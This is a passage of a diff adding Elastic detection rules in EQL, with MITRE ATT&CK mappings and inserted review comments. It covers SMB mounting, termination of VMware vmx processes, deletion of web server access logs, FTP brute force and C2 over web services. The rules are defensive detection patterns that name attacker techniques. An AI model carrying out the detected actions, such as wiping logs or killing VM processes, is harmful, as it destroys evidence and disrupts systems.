"64cfca9e-0f6f-4048-8251-9ec56a055e9e", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "64cfca9e-0f6f-4048-8251-9ec56a055e9e_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_107.json b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_107.json new file mode 100644 index 00000000000..40433fdffa2 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_107.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of macOS built-in commands to mount a Server Message Block (SMB) network share. Adversaries may use valid accounts to interact with a remote network share using SMB.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Mount SMB Share via Command Line", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n (\n process.name : \"mount_smbfs\" or\n (process.name : \"open\" and process.args : \"smb://*\") or\n (process.name : \"mount\" and process.args : \"smbfs\") or\n (process.name : \"osascript\" and process.command_line : \"osascript*mount volume*smb://*\")\n ) and\n not process.parent.executable : \"/Applications/Google Drive.app/Contents/MacOS/Google Drive\"\n", + "references": [ + "https://www.freebsd.org/cgi/man.cgi?mount_smbfs", + "https://ss64.com/osx/mount.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "661545b4-1a90-4f45-85ce-2ebd7c6a15d0", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "661545b4-1a90-4f45-85ce-2ebd7c6a15d0_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_6.json b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_6.json new file mode 100644 index 00000000000..4a80c88c502 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_6.json 
@@ -0,0 +1,82 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where VMware processes, such as \"vmware-vmx\" or \"vmx,\" are terminated on a Linux system by a \"kill\" command. The rule monitors for the \"end\" event type, which signifies the termination of a process. The presence of a \"kill\" command as the parent process for terminating VMware processes may indicate that a threat actor is attempting to interfere with the virtualized environment on the targeted system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Termination of ESXI Process", + "query": "process where host.os.type == \"linux\" and event.type == \"end\" and process.name in (\"vmware-vmx\", \"vmx\")\nand process.parent.name == \"kill\"\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6641a5af-fb7e-487a-adc4-9e6503365318", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Impact", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "6641a5af-fb7e-487a-adc4-9e6503365318_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_105.json b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_105.json new file mode 100644 index 00000000000..8426e58fcb6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_105.json 
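Review bot: The `setup` text links the agent-policy guide at a pinned version, `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, while the equivalent setup text elsewhere in this diff (the macOS rule just above) uses `https://www.elastic.co/guide/en/fleet/current/agent-policy.html`; the pinned link will age out and should be switched to `current`. The rule `name` spells the product `ESXI` where the reference URL and the vendor write `ESXi`. The clause `process.parent.name == \"kill\"` depends on how the data source fills the parent of the process on an `end` event; that is presumably the parent of the terminated vmx process rather than the sender of the signal, so it is worth confirming against Elastic Defend and Endgame end events that the condition matches the behavior the description promises.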
@@ -0,0 +1,77 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of WebServer access logs. This may indicate an attempt to evade detection or destroy forensic evidence on a system.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "WebServer Access Logs Deleted", + "query": "file where event.type == \"deletion\" and\n file.path : (\"C:\\\\inetpub\\\\logs\\\\LogFiles\\\\*.log\",\n \"/var/log/apache*/access.log\",\n \"/etc/httpd/logs/access_log\",\n \"/var/log/httpd/access_log\",\n \"/var/www/*/logs/access.log\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "665e7a4f-c58e-4fc6-bc83-87a7572670ac", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": 
"https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 105 + }, + "id": "665e7a4f-c58e-4fc6-bc83-87a7572670ac_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_6.json b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_6.json new file mode 100644 index 00000000000..0400b6c6402 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_6.json 
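Review bot: The Windows path in the query is anchored to a fixed drive letter, the JSON-escaped `\"C:\\\\inetpub\\\\logs\\\\LogFiles\\\\*.log\"`, whereas the other Windows rule in this diff uses the `?:` drive wildcard for all of its `process.executable` patterns; IIS logs on a non-C: volume are therefore outside the rule, and `\"?:\\\\inetpub\\\\logs\\\\LogFiles\\\\*.log\"` would be consistent with the rest of the package. The tags carry `OS: macOS`, but none of the listed paths is macOS-specific — as far as I recall the bundled Apache there writes `access_log` under `/var/log/apache2/`, which the `access.log` patterns do not match — so either a matching path belongs in the list or the tag overstates coverage. The `file.path :` operator is case-insensitive, so the mixed case in `LogFiles` is not itself a problem.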
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An FTP (file transfer protocol) brute force attack is a method where an attacker systematically tries different combinations of usernames and passwords to gain unauthorized access to an FTP server, and if successful, the impact can include unauthorized data access, manipulation, or theft, compromising the security and integrity of the server and potentially exposing sensitive information. This rule identifies multiple consecutive authentication failures targeting a specific user account from the same source address and within a short time interval, followed by a successful authentication.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Successful Linux FTP Brute Force Attack Detected", + "query": "sequence by host.id, auditd.data.addr, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal == \"ftp\" and event.outcome == \"failure\" and auditd.data.addr != null and\n auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal == \"ftp\" and event.outcome == \"success\" and auditd.data.addr != null and\n auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] | tail 1\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.addr", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.terminal", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + 
}, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "related.user", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd 
daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", 
+ "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_7.json b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_7.json new file mode 100644 index 00000000000..2d198430803 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_7.json 
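Review bot: The `setup` string of this version 6 file begins `\nThis rule requires data coming in from…` without the `## Setup` heading that every other `setup` in this diff opens with, and it ends with a doubled newline; the version 7 copy of the same rule added in the next hunk fixes both, so this file looks like a superseded revision shipped alongside its replacement — confirm it is intentionally retained as rule history rather than a leftover. Both versions also omit `\"timestamp_override\": \"event.ingested\"`, which the other EQL rules in this diff set; if that is the deliberate convention for `sequence` rules this is fine, otherwise auditd events that arrive late relative to `@timestamp` may fall outside the rule's lookback despite the 5 s `maxspan`. The same points apply to the hunk for `66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_7.json`.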
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An FTP (file transfer protocol) brute force attack is a method where an attacker systematically tries different combinations of usernames and passwords to gain unauthorized access to an FTP server, and if successful, the impact can include unauthorized data access, manipulation, or theft, compromising the security and integrity of the server and potentially exposing sensitive information. This rule identifies multiple consecutive authentication failures targeting a specific user account from the same source address and within a short time interval, followed by a successful authentication.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Successful Linux FTP Brute Force Attack Detected", + "query": "sequence by host.id, auditd.data.addr, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal == \"ftp\" and event.outcome == \"failure\" and auditd.data.addr != null and\n auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal == \"ftp\" and event.outcome == \"success\" and auditd.data.addr != null and\n auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] | tail 1\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.addr", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.terminal", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + 
}, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "related.user", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the 
auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": 
"https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 7 + }, + "id": "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_111.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_111.json new file mode 100644 index 00000000000..0e37a31cb56 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_111.json 
@@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.network-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Connection to Commonly Abused Web Services", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network 
